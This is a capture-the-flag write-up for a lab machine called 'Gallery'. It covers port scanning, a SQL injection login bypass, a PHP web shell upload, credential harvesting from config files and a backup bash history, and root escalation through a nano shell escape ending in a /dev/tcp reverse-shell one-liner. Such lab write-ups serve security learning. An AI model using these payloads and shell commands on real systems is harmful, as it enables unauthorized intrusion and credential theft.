Gallery

Web Recon - File Upload - Mike's backup folder - Nano PrivEsc

Recon

First run up Rust-nmap and got two ports open , that is port 80 and port 8080

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds

Decided to open port 80 on my browser and it gave out apache server homepage

Now I open up , the other port 8080 , which is a proxy , and it redirects me to https://ip/gallery/ which has a login page

Initial Access & Foothold

So on the login page, I try SQLi with the payload : admin ' or 1=1 limit 1-- +' and I was able to login as administrator

Looking around the dashbord I found an upload field on the profile settings, so I uploaded the file captured the request , and then edited the file contents , to a simple web shell

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And now time to pop shell

Now that I have shell, I decided to look for configuration files, and I found config.php but it was importing files from another folder

<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();

require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;

I was able to find DBConnection.php from classes folder and it had the following

<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{

    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    
    public $conn;
    
    public function __construct(){

        if (!isset($this->conn)) {
            
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }            
        }    
        
    }
    public function __destruct(){
        $this->conn->close();
    }
}
?>

which means the values of those variables are at initialize.php

<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

I was able to get mysql creds , and $dev_data information which seem to be creds for the developer , and there was the username and password as hash, I was able to answer number three by login to mysql and then copying the hash for admin!
First thing I did, was to update the shell, so as it doesn’t give those shell errors

www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
export TERM=xterm

I was able to update the shell, and as I was checking through /var/backups I was able to see a user’s backup folder mike, so I read the history, and I was able to get the password

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit

User.txt

www-data@gallery:/var/backups/mike_home_backup$ su mike
Password: 
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}

Privilege Escalation

I first run sudo -l and I got to see what commands can mike run as root

mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

I read the file /opt/rootkit.sh

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

After looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at gtfobins

^R^X [control+R + control+X]
reset; sh 1>&0 2>&0

and from here now I can type

/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"

Set a listener on your terminal and boom we have root shell

[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)

PreviousRabbit NextOverpass

Last updated 1 year ago

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90 Nmap scan report for 10.10.112.90 Host is up (0.36s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: Simple Image Gallery System | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id" uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

<?php ob_start(); ini_set('date.timezone','Asia/Manila'); date_default_timezone_set('Asia/Manila'); session_start(); require_once('initialize.php'); require_once('classes/DBConnection.php'); require_once('classes/SystemSettings.php'); $db = new DBConnection; $conn = $db->conn;

<?php if(!defined('DB_SERVER')){ require_once("../initialize.php"); } class DBConnection{ private $host = DB_SERVER; private $username = DB_USERNAME; private $password = DB_PASSWORD; private $database = DB_NAME; public $conn; public function __construct(){ if (!isset($this->conn)) { $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database); if (!$this->conn) { echo 'Cannot connect to database server'; exit; } } } public function __destruct(){ $this->conn->close(); } } ?>

<?php $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>''); if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/"); if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' ); if(!defined('dev_data')) define('dev_data',$dev_data); if(!defined('DB_SERVER')) define('DB_SERVER',"localhost"); if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user"); if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321"); if(!defined('DB_NAME')) define('DB_NAME',"gallery_db"); ?>

www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null <ome_backup$ /usr/bin/script -qc /bin/bash /dev/null www-data@gallery:/var/backups/mike_home_backup$ ^Z [1]+ Stopped nc -lnvp 1337 [tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg nc -lnvp 1337 export TERM=xterm

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history cat .bash_history cd ~ ls ping 1.1.1.1 cat /home/mike/user.txt cd /var/www/ ls cd html ls -al cat index.html sudo -lb[REDACTED]x clear sudo -l exit

www-data@gallery:/var/backups/mike_home_backup$ su mike Password: mike@gallery:/var/backups/mike_home_backup$ cd ~ mike@gallery:~$ ls documents images user.txt mike@gallery:~$ cat user.txt THM{af05[REDACTED]46ef}

mike@gallery:~$ sudo -l Matching Defaults entries for mike on gallery: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mike may run the following commands on gallery: (root) NOPASSWD: /bin/bash /opt/rootkit.sh

#!/bin/bash read -e -p "Would you like to versioncheck, update, list or read the report ? " ans; # Execute your choice case $ans in versioncheck) /usr/bin/rkhunter --versioncheck ;; update) /usr/bin/rkhunter --update;; list) /usr/bin/rkhunter --list;; read) /bin/nano /root/report.txt;; *) exit;; esac